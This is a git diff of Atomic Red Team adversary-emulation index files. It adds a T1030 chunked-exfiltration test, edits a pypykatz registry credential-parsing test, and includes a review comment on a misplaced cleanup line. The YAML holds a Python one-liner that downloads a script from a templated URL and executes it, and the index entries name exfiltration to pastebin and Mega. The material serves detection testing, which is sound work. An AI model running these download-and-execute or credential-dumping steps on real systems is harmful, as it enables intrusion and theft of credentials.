Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.004/T1555.004.md"}]},{"techniqueID":"T1556","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556/T1556.md"}]},{"techniqueID":"T1556.002","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1556.003","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.003/T1556.003.md"}]},{"techniqueID":"T1557","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557/T1557.md"}]},{"techniqueID":"T1557.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1558","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558/T1558.md"}]},{"techniqueID":"T1558.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.002/T1558.002.md"}]},{"techniqueID":"T1558.003","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1559","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559/T1559.md"}]},{"techniqueID":"T1559.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1560","score":15,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}]},{"techniqueID":"T1560.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"}]},{"techniqueID":"T1562","score":118,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.001","score":52,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.002","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.003","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"}]},{"techniqueID":"T1562.004","score":23,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.008","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1562.009","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.009/T1562.009.md"}]},{"techniqueID":"T1562.010","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.010/T1562.010.md"}]},{"techniqueID":"T1563","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563/T1563.md"}]},{"techniqueID":"T1563.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1564","score":28,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1564.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1564.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.006/T1564.006.md"}]},{"techniqueID":"T1566","score":2,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566/T1566.md"}]},{"techniqueID":"T1566.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1567","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1567.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.002/T1567.002.md"}]},{"techniqueID":"T1567.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.003/T1567.003.md"}]},{"techniqueID":"T1569","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569/T1569.md"}]},{"techniqueID":"T1569.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"}]},{"techniqueID":"T1569.002","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1570","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1570/T1570.md"}]},{"techniqueID":"T1571","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574/T1574.md"}]},{"techniqueID":"T1574.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"}]},{"techniqueID":"T1574.008","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.008/T1574.008.md"}]},{"techniqueID":"T1574.009","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1580","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1580/T1580.md"}]},{"techniqueID":"T1592","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592/T1592.md"}]},{"techniqueID":"T1592.001","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592.001/T1592.001.md"}]},{"techniqueID":"T1606","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606/T1606.md"}]},{"techniqueID":"T1606.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]},{"techniqueID":"T1609","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1610","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"}]},{"techniqueID":"T1611","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]},{"techniqueID":"T1612","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1612/T1612.md"}]},{"techniqueID":"T1613","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1613/T1613.md"}]},{"techniqueID":"T1614","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614/T1614.md"}]},{"techniqueID":"T1614.001","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614.001/T1614.001.md"}]},{"techniqueID":"T1615","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1615/T1615.md"}]},{"techniqueID":"T1619","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]},{"techniqueID":"T1620","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1620/T1620.md"}]},{"techniqueID":"T1647","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1647/T1647.md"}]},{"techniqueID":"T1649","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1649/T1649.md"}]},{"techniqueID":"T1654","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1654/T1654.md"}]}]} \ No newline at end of file diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 2a69beb328..e766aaa92c 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv 
@@ -1900,6 +1900,7 @@ exfiltration,T1048,Exfiltration Over Alternative Protocol,3,DNSExfiltration (doh exfiltration,T1567.003,Exfiltration Over Web Service: Exfiltration to Text Storage Sites,1,Exfiltrate data with HTTP POST to text storage sites - pastebin.com (Windows),c2e8ab6e-431e-460a-a2aa-3bc6a32022e3,powershell exfiltration,T1567.002,Exfiltration Over Web Service: Exfiltration to Cloud Storage,1,Exfiltrate data with rclone to cloud Storage - Mega (Windows),8529ee44-279a-4a19-80bf-b846a40dda58,powershell exfiltration,T1030,Data Transfer Size Limits,1,Data Transfer Size Limits,ab936c51-10f4-46ce-9144-e02137b2016a,sh +exfiltration,T1030,Data Transfer Size Limits,2,Network-Based Data Transfer in Small Chunks,f0287b58-f4bc-40f6-87eb-692e126e7f8f,powershell exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,1,Exfiltration Over Alternative Protocol - HTTP,1d1abbd6-a3d3-4b2e-bef5-c59293f46eff,manual exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,2,Exfiltration Over Alternative Protocol - ICMP,dd4b4421-2e25-4593-90ae-7021947ad12e,powershell exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,3,Exfiltration Over Alternative Protocol - DNS,c403b5a4-b5fc-49f2-b181-d1c80d27db45,manual diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index e6fd7d3be5..d757c94202 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv 
@@ -1244,6 +1244,7 @@ exfiltration,T1041,Exfiltration Over C2 Channel,2,Text Based Data Exfiltration u exfiltration,T1048,Exfiltration Over Alternative Protocol,3,DNSExfiltration (doh),c943d285-ada3-45ca-b3aa-7cd6500c6a48,powershell exfiltration,T1567.003,Exfiltration Over Web Service: Exfiltration to Text Storage Sites,1,Exfiltrate data with HTTP POST to text storage sites - pastebin.com (Windows),c2e8ab6e-431e-460a-a2aa-3bc6a32022e3,powershell exfiltration,T1567.002,Exfiltration Over Web Service: Exfiltration to Cloud Storage,1,Exfiltrate data with rclone to cloud Storage - Mega (Windows),8529ee44-279a-4a19-80bf-b846a40dda58,powershell +exfiltration,T1030,Data Transfer Size Limits,2,Network-Based Data Transfer in Small Chunks,f0287b58-f4bc-40f6-87eb-692e126e7f8f,powershell exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,2,Exfiltration Over Alternative Protocol - ICMP,dd4b4421-2e25-4593-90ae-7021947ad12e,powershell exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,4,Exfiltration Over Alternative Protocol - HTTP,6aa58451-1121-4490-a8e9-1dada3f1c68c,powershell exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,5,Exfiltration Over Alternative Protocol - SMTP,ec3a835e-adca-4c7c-88d2-853b69c11bb9,powershell diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 98a89eb663..7e2c164db3 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md 
@@ -2736,6 +2736,7 @@ - Atomic Test #1: Exfiltrate data with rclone to cloud Storage - Mega (Windows) [windows] - [T1030 Data Transfer Size Limits](../../T1030/T1030.md) - Atomic Test #1: Data Transfer Size Limits [macos, linux] + - Atomic Test #2: Network-Based Data Transfer in Small Chunks [windows] - T1537 Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1052 Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 0b98be71d4..185f388f25 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -1835,7 +1835,8 @@ - Atomic Test #1: Exfiltrate data with HTTP POST to text storage sites - pastebin.com (Windows) [windows] - [T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage](../../T1567.002/T1567.002.md) - Atomic Test #1: Exfiltrate data with rclone to cloud Storage - Mega (Windows) [windows] -- T1030 Data Transfer Size Limits [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) +- [T1030 Data Transfer Size Limits](../../T1030/T1030.md) + - Atomic Test #2: Network-Based Data Transfer in Small Chunks [windows] - T1052 Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) - Atomic Test #2: Exfiltration Over Alternative Protocol - ICMP [windows] 
diff --git a/atomics/Indexes/Matrices/windows-matrix.md b/atomics/Indexes/Matrices/windows-matrix.md
index 0c7025e1a6..205a1d5141 100644
--- a/atomics/Indexes/Matrices/windows-matrix.md
+++ b/atomics/Indexes/Matrices/windows-matrix.md
@@ -15,7 +15,7 @@ | Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Deployment Tools](../../T1072/T1072.md) | [Active Setup](../../T1547.014/T1547.014.md) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | [Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md) | [Unsecured Credentials: Credentials in Registry](../../T1552.002/T1552.002.md) | [Network Share Discovery](../../T1135/T1135.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Automated Collection](../../T1119/T1119.md) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: PowerShell](../../T1059.001/T1059.001.md) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | [Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md) | System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | [Peripheral Device Discovery](../../T1120/T1120.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Clipboard Data](../../T1115/T1115.md) | [Exfiltration Over Web Service: Exfiltration to Text Storage Sites](../../T1567.003/T1567.003.md) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | 
Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Spearphishing Voice [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Inter-Process Communication](../../T1559/T1559.md) | [Office Application Startup](../../T1137/T1137.md) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Steal or Forge Kerberos Tickets: AS-REP Roasting](../../T1558.004/T1558.004.md) | [System Information Discovery](../../T1082/T1082.md) | [Lateral Tool Transfer](../../T1570/T1570.md) | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Web Service: Exfiltration to Cloud Storage](../../T1567.002/T1567.002.md) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Financial Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | -| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Wi-Fi Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote Service Session Hijacking: RDP Hijacking](../../T1563.002/T1563.002.md) | [Data from Local System](../../T1005/T1005.md) | Data Transfer 
Size Limits [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Defacement: Internal Defacement](../../T1491.001/T1491.001.md) | +| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Wi-Fi Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote Service Session Hijacking: RDP Hijacking](../../T1563.002/T1563.002.md) | [Data from Local System](../../T1005/T1005.md) | [Data Transfer Size Limits](../../T1030/T1030.md) | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Defacement: Internal Defacement](../../T1491.001/T1491.001.md) | | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter: Python [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Thread Execution Hijacking](../../T1055.003/T1055.003.md) | Mavinject [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores](../../T1555/T1555.md) | [Application Window Discovery](../../T1010/T1010.md) | [Use Alternate Authentication Material: Pass 
the Hash](../../T1550.002/T1550.002.md) | Archive Collected Data: Archive via Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Office Application Startup: Add-ins](../../T1137.006/T1137.006.md) | [Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md) | [Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | Unsecured Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote Services: Remote Desktop Protocol](../../T1021.001/T1021.001.md) | [Archive Collected Data](../../T1560/T1560.md) | [Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Access Removal](../../T1531/T1531.md) | | Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: Windows Command Shell](../../T1059.003/T1059.003.md) | [Server Software Component: Transport Agent](../../T1505.002/T1505.002.md) | [Boot or Logon Autostart Execution: Port Monitors](../../T1547.010/T1547.010.md) | Masquerade File Type [CONTRIBUTE A 
TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Browser Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) | diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 52be490327..ef25790853 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -52301,7 +52301,8 @@ execution: which_python=$(which python || which python3 || which python3.9 || which python2) $which_python -c 'import requests;import os;url = "#{script_url}";malicious_command = "#{executor} #{payload_file_name} #{script_args}";session = requests.session();source = session.get(url).content;fd = open("#{payload_file_name}", "wb+");fd.write(source);fd.close();os.system(malicious_command)' name: sh - cleanup_command: "rm #{payload_file_name} \n" + cleanup_command: "rm #{payload_file_name} \npip-autoremove pypykatz >nul 2> + nul\n" - name: Execute Python via scripts auto_generated_guid: 6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8 description: Create Python file (.py) that downloads and executes shell script 
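Review bot: The added second line of `cleanup_command` runs under the `sh` executor named just above it, where `>nul 2> nul` is cmd.exe syntax and creates a file called `nul` in the working directory instead of discarding output. Nothing in the visible command installs pypykatz or pip-autoremove, so the line looks like a paste from the Windows pypykatz tests; I would drop it and keep `cleanup_command: "rm #{payload_file_name} \n"`. If a package removal really is intended here, the redirect should be `>/dev/null 2>&1`. The test entry starts above this hunk, and this index appears to be generated, so the fix probably belongs in the technique's own YAML.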
@@ -82666,44 +82667,51 @@ credential-access: elevation_required: true - name: Registry parse with pypykatz auto_generated_guid: a96872b2-cbf3-46cf-8eb4-27e8c0e85263 - description: 'Parses registry hives to obtain stored credentials + description: | + Parses registry hives to obtain stored credentials. - ' + Will create a Python virtual environment within the External Payloads folder that can be deleted manually post test execution. supported_platforms: - windows - dependency_executor_name: command_prompt + input_arguments: + venv_path: + description: Path to the folder for the tactics venv + type: string + default: PathToAtomicsFolder\..\ExternalPayloads\venv_t1003_002 + dependency_executor_name: powershell dependencies: - description: 'Computer must have python 3 installed ' - prereq_command: | - py -3 --version >nul 2>&1 - exit /b %errorlevel% - get_prereq_command: 'echo "Python 3 must be installed manually" + prereq_command: 'if (Get-Command py -errorAction SilentlyContinue) { exit + 0 } else { exit 1 } ' - - description: 'Computer must have pip installed + get_prereq_command: | + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null + invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" + Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait + - description: 'Computer must have venv configured at #{venv_path} ' - prereq_command: | - py -3 -m pip --version >nul 2>&1 - exit /b %errorlevel% - get_prereq_command: 'echo "PIP must be installed manually" + prereq_command: 'if (Test-Path -Path "#{venv_path}") { exit 0 } else { exit + 1 } ' - - description: 'pypykatz must be installed and part of PATH + get_prereq_command: 'py -m venv "#{venv_path}" ' - prereq_command: | - pypykatz -h >nul 2>&1 - exit /b %errorlevel% 
